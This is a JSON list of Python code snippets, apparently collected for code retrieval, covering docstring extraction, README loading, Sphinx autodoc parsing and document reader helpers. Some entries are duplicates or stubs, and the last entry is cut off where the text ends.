[ "def get_readers():\n return all_readers", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def read_documentation(self, fid):\r\n\r\n lin = self.read_line(fid)\r\n while lin[0] != ':':\r\n self.documentation.append(lin)\r\n lin = self.read_line(fid)\r\n return lin", "def get_docs_and_page():\n _, *args = sys.argv[:]\n if len(args) > 0:\n print(pydoc.getdoc(*args))\n return pydoc.getdoc(*args)", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "def get_reader_funcs():\n return READERS", "def get_documentation(self, *args, **dargs):\n pass", "def chain(*readers):\n\n def reader():\n rs = []\n for r in readers:\n rs.append(r())\n\n for e in itertools.chain(*rs):\n yield e\n\n return reader", "def doc(self):\n return \"\\n\".join(self.docLines)", "def docs():", "def docLines(self):\n summary, description = self._getDocParts()\n if description:\n return summary + [\"\"] + description\n return summary", "def summarize_rcdocs(modnames, headersep=\"=\", maxdflt=2000):\n nods = \"No docstring provided.\"\n template = \":{0!s}: {1!s}, *default:* {2}.\"\n docstrs = []\n tw = textwrap.TextWrapper(width=80, subsequent_indent=\" \"*4)\n for modname in modnames:\n moddoc = str(modname)\n moddoc += \"\\n\"+ headersep * len(moddoc) + \"\\n\"\n plugins = Plugins([modname], loaddeps=False) # get a lone plugin\n plugins.merge_rcs()\n rc = plugins.rc\n rcdocs = plugins.rcdocs\n for key in sorted(rc._dict.keys()):\n dflt = getattr(rc, key)\n rdflt = repr(dflt)\n rdflt = rdflt if len(rdflt) <= maxdflt else \"{0}.{1} instance\".format(\n dflt.__class__.__module__, dflt.__class__.__name__)\n rcdoc = template.format(key, rcdocs.get(key, nods), rdflt)\n moddoc += \"\\n\".join(tw.wrap(rcdoc)) + '\\n'\n docstrs.append(moddoc)\n return \"\\n\\n\\n\".join(docstrs)", "def get_documentation(path=\"\"):\n return \"\"\"<HTML><head><title>Python Minidoc for \"\"\"+path+\"\"\"</title></head>\n <body>\n \"\"\"+get_documentation_body(path)+\"\"\"\n </body></html>\"\"\"", "def get_documented(filenames):\r\n documented = {}\r\n for filename in filenames:\r\n f = open(filename, 'r')\r\n lines = f.read().splitlines()\r\n documented.update(get_documented_in_lines(lines, filename=filename))\r\n f.close()\r\n return documented", "def get_documented(filenames):\n documented = {}\n for filename in filenames:\n f = open(filename, 'r')\n lines = f.read().splitlines()\n documented.update(get_documented_in_lines(lines, filename=filename))\n f.close()\n return documented", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def getDoc(self):\r\n return self.__doc__", "def parse_docs(docs):\n if not docs:\n return __name__, \"<no documentation>\"\n docs = docs.strip().split('\\n')\n for i, line in enumerate(docs):\n docs[i] = line.strip()\n return docs[0], ' '.join(docs[1:]) if len(docs[1:]) else \"<no documentation>\"", "def get_doc(cls_or_func):\n try:\n return cls_or_func.__doc__.split(\"\\n\")[0].strip()\n except (AttributeError, IndexError):\n return None", "def with_docs(self):\r\n self._configurations.append('javadoc')\r\n return self", "def get_documented_in_docstring(name, module=None, filename=None):\r\n try:\r\n obj, real_name = import_by_name(name)\r\n lines = pydoc.getdoc(obj).splitlines()\r\n return get_documented_in_lines(lines, module=name, filename=filename)\r\n except AttributeError:\r\n pass\r\n except ImportError, e:\r\n print \"Failed to import '%s': %s\" % (name, e)\r\n return {}", "def doc(self):\n doc = self.get('doc')\n if doc:\n from .config import defaults\n return defaults.types.doc(doc)", "def documentation_only():\n pass", "def get(self, *args):\n return self.docs.get(*args)", "def get_documented_in_docstring(name, module=None, filename=None):\n try:\n obj, real_name = import_by_name(name)\n lines = pydoc.getdoc(obj).splitlines()\n return get_documented_in_lines(lines, module=name, filename=filename)\n except AttributeError:\n pass\n except ImportError, e:\n print \"Failed to import '%s': %s\" % (name, e)\n return {}", "def documentation(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"documentation\")", "def documentation():\n return auto.html()", "def hotkeys_readme():\n\n root = '/'.join(__file__.split('/')[:-4])\n fname = root + '/README.rst'\n with codecs.open(fname, 'r', 'utf-8') as f:\n rst = f.read()\n hotkeys = rst.split('.. hotkeys')[1]\n return docutils.examples.html_body(hotkeys)", "def main(rc):\n with store_client(rc) as sclient:\n for doc in rc.documents:\n sclient.copydoc(doc)", "def _get_doc(self, name):\r\n if name == 'keyboard':\r\n return 'Built-in Function: keyboard ()'\r\n exist = self._eval('exist {0}'.format(name), log=False, verbose=False)\r\n if exist.strip() == 'ans = 0':\r\n msg = 'Name: \"%s\" does not exist on the Octave session path'\r\n raise Oct2PyError(msg % name)\r\n doc = 'No documentation for %s' % name\r\n try:\r\n doc = self._eval('help {0}'.format(name), log=False, verbose=False)\r\n except Oct2PyError as e:\r\n if 'syntax error' in str(e):\r\n raise(e)\r\n try:\r\n doc = self._eval('type {0}'.format(name), log=False,\r\n verbose=False)\r\n doc = '\\n'.join(doc.splitlines()[:3])\r\n except Oct2PyError as e:\r\n pass\r\n return doc", "def get_commands_and_docstrings(self):\r\n for command, function in self._commands.items():\r\n if command is not None:\r\n yield command, function.__doc__", "def get_readme():\n for name in ('README', 'README.rst', 'README.md'):\n if os.path.exists(name):\n return read_file(name)\n return ''", "def readme(self, ref=None):\r\n params = base.get_params(None, locals())\r\n url = '{0}/readme'.format(self.parent.get_url())\r\n\r\n return http.Request('GET', url, params), parsers.parse_json", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def get_documented_in_lines(lines, module=None, filename=None):\r\n title_underline_re = re.compile(\"^[-=*_^#]{3,}\\s*$\")\r\n autodoc_re = re.compile(\".. auto(function|method|attribute|class \\\r\n |exception|module)::\\s*([A-Za-z0-9_.]+)\\s*$\")\r\n autosummary_re = re.compile(r'^\\.\\.\\s+autosummary::\\s*')\r\n module_re = re.compile(\r\n r'^\\.\\.\\s+(current)?module::\\s*([a-zA-Z0-9_.]+)\\s*$')\r\n autosummary_item_re = re.compile(r'^\\s+([_a-zA-Z][a-zA-Z0-9_.]*)\\s*')\r\n toctree_arg_re = re.compile(r'^\\s+:toctree:\\s*(.*?)\\s*$')\r\n\r\n documented = {}\r\n\r\n current_title = []\r\n last_line = None\r\n toctree = None\r\n current_module = module\r\n in_autosummary = False\r\n\r\n for line in lines:\r\n try:\r\n if in_autosummary:\r\n m = toctree_arg_re.match(line)\r\n if m:\r\n toctree = m.group(1)\r\n continue\r\n\r\n if line.strip().startswith(':'):\r\n continue # skip options\r\n\r\n m = autosummary_item_re.match(line)\r\n if m:\r\n name = m.group(1).strip()\r\n if current_module and not name.startswith(\r\n current_module + '.'):\r\n name = \"%s.%s\" % (current_module, name)\r\n\r\n documented.setdefault(name, []).append(\r\n (filename, current_title, 'autosummary', toctree))\r\n continue\r\n if line.strip() == '':\r\n continue\r\n in_autosummary = False\r\n\r\n m = autosummary_re.match(line)\r\n if m:\r\n in_autosummary = True\r\n continue\r\n\r\n m = autodoc_re.search(line)\r\n if m:\r\n name = m.group(2).strip()\r\n if m.group(1) == \"module\":\r\n current_module = name\r\n documented.update(get_documented_in_docstring(\r\n name, filename=filename))\r\n elif current_module and not name.startswith(\r\n current_module + '.'):\r\n name = \"%s.%s\" % (current_module, name)\r\n\r\n documented.setdefault(name, []).append(\r\n (filename, current_title, \"auto\" + m.group(1), None))\r\n continue\r\n\r\n m = title_underline_re.match(line)\r\n if m and last_line:\r\n current_title = last_line.strip()\r\n continue\r\n\r\n m = module_re.match(line)\r\n if m:\r\n current_module = m.group(2)\r\n continue\r\n finally:\r\n last_line = line\r\n\r\n return documented", "def _generate_autodoc(\n self, entry: _MemberDocumenterEntry,\n summary=False) -> Tuple[sphinx.addnodes.desc, Optional[str]]:\n\n rst_strings = docutils.statemachine.StringList()\n entry.documenter.directive.result = rst_strings\n\n if entry.overload and entry.overload.overload_id is not None:\n # Force autodoc to use the overload-specific signature. autodoc already\n # has an internal mechanism for overriding the docstrings based on the\n # `_new_docstrings` member.\n entry.documenter._new_docstrings = [ # pylint: disable=protected-access\n sphinx.util.docstrings.prepare_docstring(\n entry.overload.doc or '',\n tabsize=self.state.document.settings.tab_width)\n ]\n # Workaround for https://github.com/sphinx-doc/sphinx/pull/9518\n orig_get_doc = entry.documenter.get_doc\n\n def get_doc(ignore: Optional[int] = None) -> List[List[str]]:\n if entry.documenter._new_docstrings is not None: # pylint: disable=protected-access\n return entry.documenter._new_docstrings # pylint: disable=protected-access\n return orig_get_doc(ignore) # type: ignore\n\n entry.documenter.get_doc = get_doc\n\n else:\n # Force autodoc to obtain the docstring through its normal mechanism,\n # which includes the \"ModuleAnalyzer\" for reading docstrings of\n # variables/attributes that are only contained in the source code.\n entry.documenter._new_docstrings = None # pylint: disable=protected-access\n orig_get_doc = None\n\n if summary and entry.is_inherited:\n overridename = entry.name\n else:\n overridename = _get_python_object_name_for_signature(entry)\n entry.documenter.format_name = lambda: overridename\n\n # Record the documenter for use by _process_docstring in `autodoc.py`.\n current_documenter_map = self.env.temp_data.setdefault(\n 'tensorstore_autodoc_current_documenter', {})\n current_documenter_map[entry.documenter.fullname] = entry.documenter\n entry.documenter.generate()\n if orig_get_doc is not None:\n del entry.documenter.get_doc\n del current_documenter_map[entry.documenter.fullname]\n\n group_name = _postprocess_autodoc_rst_output(rst_strings, summary=summary)\n\n entry.documenter.titles_allowed = True\n nodes = [\n x for x in sphinx.ext.autodoc.directive.parse_generated_content(\n self.state, entry.documenter.directive.result, entry.documenter)\n if isinstance(x, sphinx.addnodes.desc)\n ]\n assert len(nodes) == 1\n node = nodes[0]\n\n if entry.subscript:\n _mark_subscript_parameterlist(node)\n if entry.full_name.endswith(_INIT_SUFFIX):\n _clean_init_signature(node)\n if entry.full_name.endswith(_CLASS_GETITEM_SUFFIX):\n _clean_class_getitem_signature(node)\n\n return node, group_name", "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def get(self, writer_id, **kwargs):\n writer = get_writer(writer_id)\n if not writer:\n api.abort(404)\n else:\n return writer", "def getdoc(object):\r\n try:\r\n doc = object.__doc__\r\n except AttributeError:\r\n return None\r\n if not isinstance(doc, types.StringTypes):\r\n return None\r\n return cleandoc(doc)", "def documentation(self):\n return self.handle.__doc__", "def getdoc():\n\n\timport webnotes\n\tfrom webnotes.utils import cint\n\t\n\tform = webnotes.form_dict\n\tdoctype, docname = form.get('doctype'), form.get('name')\n\tprefix = cint(form.get('from_archive')) and 'arc' or 'tab'\n\n\tif not (doctype and docname):\n\t\traise Exception, 'doctype and name required!'\n\t\n\tdoclist = []\n\t# single\n\tdoclist = load_single_doc(doctype, docname, (form.get('user') or webnotes.session['user']), prefix)\n\t\n\t# load doctype along with the doc\n\tif form.get('getdoctype'):\n\t\timport webnotes.model.doctype\n\t\tdoclist += webnotes.model.doctype.get(doctype)\n\n\t# tag as archived\n\tif prefix == 'arc':\n\t\tdoclist[0].__archived=1\n\n\twebnotes.response['docs'] = doclist", "def get_documented_in_lines(lines, module=None, filename=None):\n title_underline_re = re.compile(\"^[-=*_^#]{3,}\\s*$\")\n autodoc_re = re.compile(\".. auto(function|method|attribute|class|exception|module)::\\s*([A-Za-z0-9_.]+)\\s*$\")\n autosummary_re = re.compile(r'^\\.\\.\\s+autosummary::\\s*')\n module_re = re.compile(r'^\\.\\.\\s+(current)?module::\\s*([a-zA-Z0-9_.]+)\\s*$')\n autosummary_item_re = re.compile(r'^\\s+([_a-zA-Z][a-zA-Z0-9_.]*)\\s*.*?')\n toctree_arg_re = re.compile(r'^\\s+:toctree:\\s*(.*?)\\s*$')\n \n documented = {}\n \n current_title = []\n last_line = None\n toctree = None\n current_module = module\n in_autosummary = False\n \n for line in lines:\n try:\n if in_autosummary:\n m = toctree_arg_re.match(line)\n if m:\n toctree = m.group(1)\n continue\n\n if line.strip().startswith(':'):\n continue # skip options\n\n m = autosummary_item_re.match(line)\n if m:\n name = m.group(1).strip()\n if current_module and not name.startswith(current_module + '.'):\n name = \"%s.%s\" % (current_module, name)\n documented.setdefault(name, []).append(\n (filename, current_title, 'autosummary', toctree))\n continue\n if line.strip() == '':\n continue\n in_autosummary = False\n\n m = autosummary_re.match(line)\n if m:\n in_autosummary = True\n continue\n\n m = autodoc_re.search(line)\n if m:\n name = m.group(2).strip()\n if m.group(1) == \"module\":\n current_module = name\n documented.update(get_documented_in_docstring(\n name, filename=filename))\n elif current_module and not name.startswith(current_module+'.'):\n name = \"%s.%s\" % (current_module, name)\n documented.setdefault(name, []).append(\n (filename, current_title, \"auto\" + m.group(1), None))\n continue\n\n m = title_underline_re.match(line)\n if m and last_line:\n current_title = last_line.strip()\n continue\n\n m = module_re.match(line)\n if m:\n current_module = m.group(2)\n continue\n finally:\n last_line = line\n\n return documented", "def get_readme():\n for name in ('README', 'README.txt', 'README.rst', 'README.md'):\n if os.path.exists(name):\n return read_file(name)\n return ''", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def get_maintainers(path, sections, level=0):\n maintainers = []\n lists = []\n for section in sections:\n tmp_maint, tmp_lists = get_section_maintainers(path, section)\n if tmp_maint:\n maintainers += tmp_maint\n if tmp_lists:\n lists += tmp_lists\n\n if not maintainers:\n # If no match found, look for match for (nonexistent) file\n # REPO.working_dir/<default>\n print('\"%s\": no maintainers found, looking for default' % path)\n if level == 0:\n maintainers = get_maintainers('<default>', sections, level=level + 1)\n else:\n print(\"No <default> maintainers set for project.\")\n if not maintainers:\n return None\n\n return maintainers + lists", "def getdoc(doctype, name, user=None):\n\n\timport webnotes\n\t\n\tif not (doctype and name):\n\t\traise Exception, 'doctype and name required!'\n\t\n\tif not name: \n\t\tname = doctype\n\n\tif not webnotes.conn.exists(doctype, name):\n\t\treturn []\n\n\ttry:\n\t\tbean = webnotes.bean(doctype, name)\n\t\tbean.run_method(\"onload\")\n\n\t\tdoclist = bean.doclist\n\n\t\t# add file list\n\t\tset_docinfo(doctype, name)\n\t\t\n\texcept Exception, e:\n\t\twebnotes.errprint(webnotes.utils.getTraceback())\n\t\twebnotes.msgprint('Did not load.')\n\t\traise e\n\n\tif bean and not name.startswith('_'):\n\t\twebnotes.user.update_recent(doctype, name)\n\t\n\twebnotes.response['docs'] = doclist", "def readerForDoc(cur, URL, encoding, options):\n ret = libxml2mod.xmlReaderForDoc(cur, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForDoc() failed')\n return xmlTextReader(_obj=ret)", "def reviewers(self) -> Optional[Sequence['outputs.AccessReviewReviewerResponse']]:\n return pulumi.get(self, \"reviewers\")", "def get_docstring(line_number, lines):\n docstring = None\n\n for index in reversed(range(line_number-1)):\n line = lines[index].strip()\n if len(line) == 0 or line.startswith(\"//\"):\n # Do not look for docstring when more than two blank lines precede\n # the element.\n if index < line_number - 1:\n return\n\n continue\n\n # Start of the docstring (from the end)\n if docstring is None:\n # If the entire docstring fit in one line\n match = re.search(\"(?<=/\\*\\* ).*(?= \\*/)\", line)\n if match is not None:\n return match.group()\n\n # No docstring\n if not line.startswith(\"*/\"):\n return\n\n docstring = []\n\n # Valid docstring line starts with a '*'\n elif re.search(\"^\\*( *| +.+)$\", line) is not None:\n indentation = 2 if len(line) > 1 else 1\n docstring.append(line[indentation:].rstrip())\n\n # Beginning of valid docstrings starts with '/**'\n elif line.startswith(\"/**\"):\n return \"\\n\".join(docstring[::-1])\n\n # Error in the docstring\n else:\n return", "def print_doc1(*args, **kwargs):\n # output settings from kwargs or take defaults\n color = kwargs.get('color', blue)\n bold = kwargs.get('bold', False)\n prefix = kwargs.get('prefix', '')\n tail = kwargs.get('tail', '\\n')\n\n def real_decorator(func):\n '''real decorator function'''\n @wraps(func)\n def wrapper(*args, **kwargs):\n '''the wrapper function'''\n try:\n prgf = first_paragraph(func.__doc__)\n print(color(prefix + prgf + tail, bold))\n except AttributeError as exc:\n name = func.__name__\n print(red(flo('{name}() has no docstring')))\n raise(exc)\n return func(*args, **kwargs)\n return wrapper\n\n invoked = bool(not args or kwargs)\n if not invoked:\n # invoke decorator function which returns the wrapper function\n return real_decorator(func=args[0])\n\n return real_decorator", "def print_doc1(*args, **kwargs):\n # output settings from kwargs or take defaults\n color = kwargs.get('color', blue)\n bold = kwargs.get('bold', False)\n prefix = kwargs.get('prefix', '')\n tail = kwargs.get('tail', '\\n')\n\n def real_decorator(func):\n '''real decorator function'''\n @wraps(func)\n def wrapper(*args, **kwargs):\n '''the wrapper function'''\n try:\n prgf = first_paragraph(func.__doc__)\n print(color(prefix + prgf + tail, bold))\n except AttributeError as exc:\n name = func.__name__\n print(red(flo('{name}() has no docstring')))\n raise(exc)\n return func(*args, **kwargs)\n return wrapper\n\n invoked = bool(not args or kwargs)\n if not invoked:\n # invoke decorator function which returns the wrapper function\n return real_decorator(func=args[0])\n\n return real_decorator", "def get_reader(self) -> SpectrumReader:\n # Get the reader class\n reader_class = self.get_reader_class()\n\n # Get the common options between ourselves and the reader class\n common_options = self.get_common_options(reader_class)\n\n # Get the options sub-list corresponding to those options\n common_option_sub_list = self.get_options_sub_list(common_options)\n\n return reader_class(common_option_sub_list)", "def docstring(func):\n try:\n lines = func.__doc__.strip().split(\"\\n\")\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def get_doc(self) -> Documentation:\n r : Documentation = [self.get_doc_string()]\n r_src = \"\"\n if hasattr(self,\"_path\"): r_src += \"locally at '%s'\" % (str(self._path))\n if self.url is not None: r_src += \" remote url(orig) '%s'\" % (self.url)\n r_src += \" remote url(parsed) '%s'\" % (self.git_url.as_string())\n if self.branch is not None: r_src += \" branch '%s'\" % (self.branch)\n r.append(r_src)\n r_stages = []\n for (sn,s) in self.stages.items():\n r_stages.append(sn)\n pass\n r_stages.sort()\n if len(r_stages)>0:\n r.append(\"Stages: %s\"%(\" \".join(r_stages)))\n pass\n return r", "def docs(self, searcher, exclude_docs=None):\r\n\r\n try:\r\n return self.matcher(searcher, exclude_docs=exclude_docs).all_ids()\r\n except TermNotFound:\r\n return []", "def documentation(self) -> str:\n return pulumi.get(self, \"documentation\")", "def readerWalker(self):\n ret = libxml2mod.xmlReaderWalker(self._o)\n if ret is None:raise treeError('xmlReaderWalker() failed')\n __tmp = xmlTextReader(_obj=ret)\n return __tmp", "def GetDocManager(self):\r\n return self._docManager", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def _get_bids_readme(self):\n readme = []\n # Grab all readme files, loop through\n for README_fname in [\n file for file in Path(self.dataset.path).glob(\"[Rr][Ee][Aa][Dd][Mm][Ee]*\")\n ]:\n # datalad get content if annexed\n self.dataset.get(README_fname)\n # read text from file\n try:\n file_text = ensure_unicode(README_fname.read_text()).strip()\n except:\n file_text = \"\"\n # Append dict with file text + extension to list\n readme.append({\"extension\": README_fname.suffix, \"text\": file_text})\n return readme if readme else None", "def get_doc(self):\n return self._doc", "def _get_docstring_and_short_description(self) -> Tuple[str, str]:\n\n if self.__doc__ is not None:\n docstring = self.__doc__\n short_description = next(line for line in self.__doc__.split(\"\\n\") if line)\n else:\n docstring = \"\"\n short_description = \"\"\n\n return docstring, short_description", "def reader(self):\n\n return self._reader", "async def setReaders(self, eventID: str, readers: Iterable[str]) -> None:", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def convert_doxygen_docstring(lines, name):\n\n lines = lines[:]\n newlines = []\n indent = 0\n reading_desc = False\n\n while lines:\n line = lines.pop(0)\n if line.startswith(\"////\"):\n continue\n\n line = line.rstrip()\n if line.startswith('///<'):\n strline = line[4:]\n else:\n strline = line\n\n strline = strline.lstrip('/ \\t')\n\n if strline == \"**\" or strline == \"*/\":\n continue\n\n if strline.startswith(\"** \"):\n strline = strline[3:]\n elif strline.startswith(\"* \"):\n strline = strline[2:]\n elif strline == \"*\":\n strline = \"\"\n\n strline = strline.lstrip(' \\t')\n\n if strline.startswith('@'):\n special = strline.split(' ', 1)[0][1:]\n if special == 'par' and strline.endswith(':') and lines and '@code' in lines[0]:\n newlines.append(' '*indent + strline[5:] + ':')\n newlines.append('')\n line = lines.pop(0)\n offset = line.index('@code')\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"verbatim\" or special == \"code\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. code-block:: guess')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"f[\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. math::')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@f]' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == 'param':\n #TODO\n #if extra is not None:\n # _, name, desc = strline.split(' ', 2)\n # extra['param:' + name] = desc\n continue\n elif special == 'deprecated':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n\n # I'd love to use the proper Sphinx deprecated tag, but it\n # requires a version number, whereas Doxygen doesn't.\n newlines.append('*Deprecated:* ' + convert_doxygen_format(value, name))\n newlines.append('')\n continue\n elif special in ('brief', 'return', 'returns'):\n #TODO\n #if extra is not None:\n # _, value = strline.split(' ', 1)\n # extra[special] = value\n continue\n elif special == 'details':\n strline = strline[9:]\n elif special == 'sa' or special == 'see':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n values = value.split(',')\n\n for i, value in enumerate(values):\n result = resolve_reference(value.partition('(')[0], name)\n if result:\n values[i] = ':{0}:`{1}`'.format(*result)\n else:\n values[i] = ':obj:`{0}`'.format(value)\n\n if special == 'see':\n newlines.append('See {}.'.format(', '.join(values)))\n else:\n newlines.append('See also {}.'.format(', '.join(values)))\n newlines.append('')\n continue\n elif special in ('note', 'warning'):\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. %s:: ' % (special))\n newlines.append('')\n newlines.append(' ' + convert_doxygen_format(strline[2 + len(special):], name))\n while lines and lines[0].strip(' *\\t/'):\n line = lines.pop(0).lstrip(' *\\t')\n newlines.append(' ' + convert_doxygen_format(line, name))\n\n newlines.append('')\n continue\n elif special == 'since':\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. versionadded:: ' + strline[7:])\n newlines.append('')\n continue\n else:\n print(\"Unhandled documentation tag: @\" + special)\n\n if strline or len(newlines) > 0:\n newlines.append(' '*indent + convert_doxygen_format(strline, name))\n\n return newlines", "def get_lyrics_writer(self) -> Optional[str]:\n return self.lyrics_writer", "def test_reader(qn_filepath, answers_dirpath):\n qns = get_questions(qn_filepath)\n for qn in qns:\n if qn.qid == 100:\n q = qn\n break\n assert q\n docs = get_documents(answers_dirpath, q.qid)\n print docs\n print docs[0].content", "def rawDoc(self):\n return self.namespace[\"__doc__\"]", "def help(command=None):\n if command is None: \n # print first line of docstring\n for cmd in commands:\n ds = commands[cmd].__doc__.split('\\n')[0]\n print \"%-16s %s\" % (cmd,ds)\n else:\n print commands[command].__doc__", "def get_docs(self):\n return get_view_description(self.callback)", "def get_fsleyes_readme():\n with open(op.join(basedir, 'README.rst'), 'rt', encoding='utf-8') as f:\n return f.read().strip()", "def doc(self) -> dict[str, tuple]:\n # TODO: create a new, better, doc interface to remove it\n plugin_commands = itertools.chain(\n self._rules_manager.get_all_commands(),\n self._rules_manager.get_all_nick_commands(),\n )\n commands = (\n (command, command.get_doc(), command.get_usages())\n for plugin_name, commands in plugin_commands\n for command in commands.values()\n )\n\n return dict(\n (name, (doc.splitlines(), [u['text'] for u in usages]))\n for command, doc, usages in commands\n for name in ((command.name,) + command.aliases)\n )", "def apiDocs():\n\treturn render_template('apiDocs.html')", "def dam_snli_reader(resources_or_conf: Union[dict, SharedResources] = None):\n from jack.readers.multiple_choice.shared import MultipleChoiceSingleSupportInputModule\n from jack.readers.natural_language_inference.decomposable_attention import DecomposableAttentionModel\n from jack.readers.multiple_choice.shared import SimpleMCOutputModule\n shared_resources = create_shared_resources(resources_or_conf)\n\n input_module = MultipleChoiceSingleSupportInputModule(shared_resources)\n model_module = DecomposableAttentionModel(shared_resources)\n output_module = SimpleMCOutputModule(shared_resources)\n return TFReader(shared_resources, input_module, model_module, output_module)", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def show_documentation(self):\n self.docs = documentation.Documentation()", "def get_contributor(username):\n\n return utils.fetch('contributor/%s' % username)", "def DocString():\n return", "def _get_doc(self, name):\r\n doc = \"No documentation for %s\" % name\r\n\r\n engine = self._engine\r\n if not engine:\r\n msg = \"Session is not open\"\r\n raise Oct2PyError(msg)\r\n doc = engine.eval('help(\"%s\")' % name, silent=True)\r\n\r\n if \"syntax error:\" in doc.lower():\r\n raise Oct2PyError(doc)\r\n\r\n if \"error:\" in doc.lower():\r\n doc = engine.eval('type(\"%s\")' % name, silent=True)\r\n doc = \"\\n\".join(doc.splitlines()[:3])\r\n\r\n default = self.feval.__doc__\r\n default = \" \" + default[default.find(\"func_args:\") :] # type:ignore\r\n default = \"\\n\".join([line[8:] for line in default.splitlines()])\r\n\r\n doc = \"\\n\".join(doc.splitlines())\r\n doc = \"\\n\" + doc + \"\\n\\nParameters\\n----------\\n\" + default\r\n doc += \"\\n**kwargs - Deprecated keyword arguments\\n\\n\"\r\n doc += \"Notes\\n-----\\n\"\r\n doc += \"Keyword arguments to dynamic functions are deprecated.\\n\"\r\n doc += \"The `plot_*` kwargs will be ignored, but the rest will\\n\"\r\n doc += \"used as key - value pairs as in version 3.x.\\n\"\r\n doc += \"Use `set_plot_settings()` for plot settings, and use\\n\"\r\n doc += \"`func_args` directly for key - value pairs.\"\r\n return doc", "def dsldocs_completers(self, event):\n # print(dir(event), event)\n command = \"%dsldocs\"\n if event.line.startswith(command):\n doc = Document(event.line.replace(command, \".docs\"))\n c = CleverCompleter()\n res = c.get_completions(doc, None)\n # print(res)\n return [x.text for x in res]", "def generator(\n *, documentation: typing.Union[generators.DocumentationStyle, str, None] = None\n) -> generators.CodeGenerator:\n return generators.CodeGenerator(\n documentation=_convert_to_enumerator(\n generators.DocumentationStyle, documentation, \"documentation\"\n )\n )", "def docstring_example(name, age, role='manager'):\n print(name, age, role)", "def map_readers(func, *readers):\n\n def reader():\n rs = []\n for r in readers:\n rs.append(r())\n for e in itertools.imap(func, *rs):\n yield e\n\n return reader", "def XCAFDoc_DocumentTool_Set(*args):\n return _XCAFDoc.XCAFDoc_DocumentTool_Set(*args)", "def test__get_doc():\n docstring = util._get_doc(\"midgard\")\n assert isinstance(docstring, str) and len(docstring) > 0", "def docstring(func: Callable) -> list[str] | None:\n try:\n lines = func.__doc__.strip().split(\"\\n\") # type: ignore\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def __doc__(self, ???):", "def docs(self):\n self._doc_info = DocumentationURL()\n self._doc_info.show()", "def doc_summary(lines):\n summary = []\n for line in lines:\n stripped = line.strip().lower()\n if (stripped.startswith('to use this normalizer') or\n stripped.startswith('use ``method')):\n continue\n if (line.startswith('Parameters') or line.startswith('Example')\n or line.startswith('.. note::')):\n break\n summary.append(line)\n return summary", "def get_docblocks(self): # type: () -> List[Tuple[str, str]]\n docstring = inspect.getdoc(self)\n result = []\n buffer = OrderedDict()\n\n for path, entry in self._config.items():\n if entry._docstring:\n result.append((docstring, self._config_to_toml(buffer, tomlkit.document())))\n\n docstring = entry._docstring\n buffer = OrderedDict()\n\n buffer[path] = entry\n\n result.append((docstring, self._config_to_toml(buffer, tomlkit.document())))\n return result", "def main():\n parser = argparse.ArgumentParser(\n description='Automatically document the API for a ROS node.')\n parser.add_argument(\n 'nodes',\n metavar=\"node\",\n type=str, nargs='*',\n help='The name of the nodes to document. If empty, ' +\n 'all nodes will be documented')\n parser.add_argument(\n '--output-dir',\n type=str,\n default=abspath(curdir),\n help='The directory where documentation should be written')\n parser.add_argument(\n '--proxy-port',\n type=int,\n default=33133,\n help='The port to use for the ROS master proxy server')\n parser.add_argument(\n '--doc-format',\n type=str,\n default=MARKDOWN,\n help=\"The format of the documentation to generate \" +\n \"(%s)\" % \", \".join(SUPPORTED_DOC_FORMATS))\n\n args = parser.parse_args()\n\n # Grab command line arguments\n nodeNames = args.nodes\n outputDir = args.output_dir\n proxyPort = args.proxy_port\n docFormat = args.doc_format.lower()\n\n # Make sure the format is valid\n if docFormat not in SUPPORTED_DOC_FORMATS:\n print \"ERROR: unknown doc-format argument: %s\" % 